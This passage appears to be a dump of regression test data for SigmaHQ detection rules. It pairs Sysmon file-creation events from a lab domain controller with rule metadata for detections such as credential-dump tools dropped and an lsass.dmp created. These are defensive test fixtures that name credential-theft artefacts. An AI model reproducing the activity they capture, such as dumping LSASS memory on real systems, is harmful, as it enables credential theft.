\"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.649129Z\"\n        }\n      },\n      \"EventRecordID\": 14985,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.250\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.653476Z\"\n        }\n      },\n      \"EventRecordID\": 14988,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf~RF2d9c20d.TMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:34.645\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.655191Z\"\n        }\n      },\n      \"EventRecordID\": 14990,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.250\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml",
    "content": "id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0b9ad457-2554-44c1-82c2-d56a99c42377\n      title: Anydesk Temporary Artefact\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:36:53.996168Z\"\n        }\n      },\n      \"EventRecordID\": 19025,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:36:53.977\",\n      \"ProcessGuid\": \"5AA13A44-523E-68FB-1700-000000004002\",\n      \"ProcessId\": 1276,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Documents\\\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx\",\n      \"CreationUtcTime\": \"2025-10-24 23:36:52.320\",\n      \"User\": \"NT AUTHORITY\\\\LOCAL SERVICE\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml",
    "content": "id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb\n      title: EVTX Created In Uncommon Location\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:38:31.938519Z\"\n        }\n      },\n      \"EventRecordID\": 20972,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:38:31.936\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll\",\n      \"CreationUtcTime\": \"2025-10-24 23:38:31.936\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml",
    "content": "id: 8da08693-5638-4236-87b1-d04b4fcc5e84\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: df6ecb8b-7822-4f4b-b412-08f524b4576c\n      title: Creation Of Non-Existent System DLL\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:39:53.705006Z\"\n        }\n      },\n      \"EventRecordID\": 22566,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:39:53.699\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Windows\\\\apppatch\\\\CustomSDB\\\\my_custom.sdb\",\n      \"CreationUtcTime\": \"2025-10-24 23:39:53.699\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml",
    "content": "id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: ee63c85c-6d51-4d12-ad09-04e25877a947\n      title: New Custom Shim Database Created\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:41:00.601559Z\"\n        }\n      },\n      \"EventRecordID\": 23503,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:41:00.589\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\tdh.dll\",\n      \"CreationUtcTime\": \"2025-10-24 23:41:00.589\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml",
    "content": "id: 61017761-38ab-4224-a43f-6cc53b67e374\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e\n      title: Files With System DLL Name In Unsuspected Locations\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:41:48.497170Z\"\n        }\n      },\n      \"EventRecordID\": 24322,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:41:48.482\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\bitsadmin.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:41:48.482\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml",
    "content": "id: e0123384-7d25-4178-b011-c1d37394d8dc\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d\n      title: Files With System Process Name In Unsuspected Locations\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.136421Z\"\n        }\n      },\n      \"EventRecordID\": 26359,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.134\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.134\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.154339Z\"\n        }\n      },\n      \"EventRecordID\": 26362,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.145\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64.exe:Zone.Identifier\",\n      \"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.160852Z\"\n        }\n      },\n      \"EventRecordID\": 26366,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.145\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64a.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.145\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.177439Z\"\n        }\n      },\n      \"EventRecordID\": 26369,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.177\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump64a.exe:Zone.Identifier\",\n      \"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.183790Z\"\n        }\n      },\n      \"EventRecordID\": 26373,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.178\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump.exe\",\n      \"CreationUtcTime\": \"2025-10-24 23:43:34.178\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:43:34.211790Z\"\n        }\n      },\n      \"EventRecordID\": 26376,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:43:34.209\",\n      \"ProcessGuid\": \"5AA13A44-D070-68FB-1A18-000000004002\",\n      \"ProcessId\": 7680,\n      \"Image\": \"C:\\\\Windows\\\\explorer.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\procdump.exe:Zone.Identifier\",\n      \"CreationUtcTime\": \"2022-11-03 15:55:14.000\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml",
    "content": "id: ef67d58b-a7c2-434f-af87-34ae280a2968\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6\n      title: Cred Dump Tools Dropped Files\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:45:24.807660Z\"\n        }\n      },\n      \"EventRecordID\": 28881,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:45:24.804\",\n      \"ProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ProcessId\": 10048,\n      \"Image\": \"C:\\\\Windows\\\\system32\\\\cmd.exe\",\n      \"TargetFilename\": \"C:\\\\lsass.dmp\",\n      \"CreationUtcTime\": \"2025-10-24 23:45:24.804\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
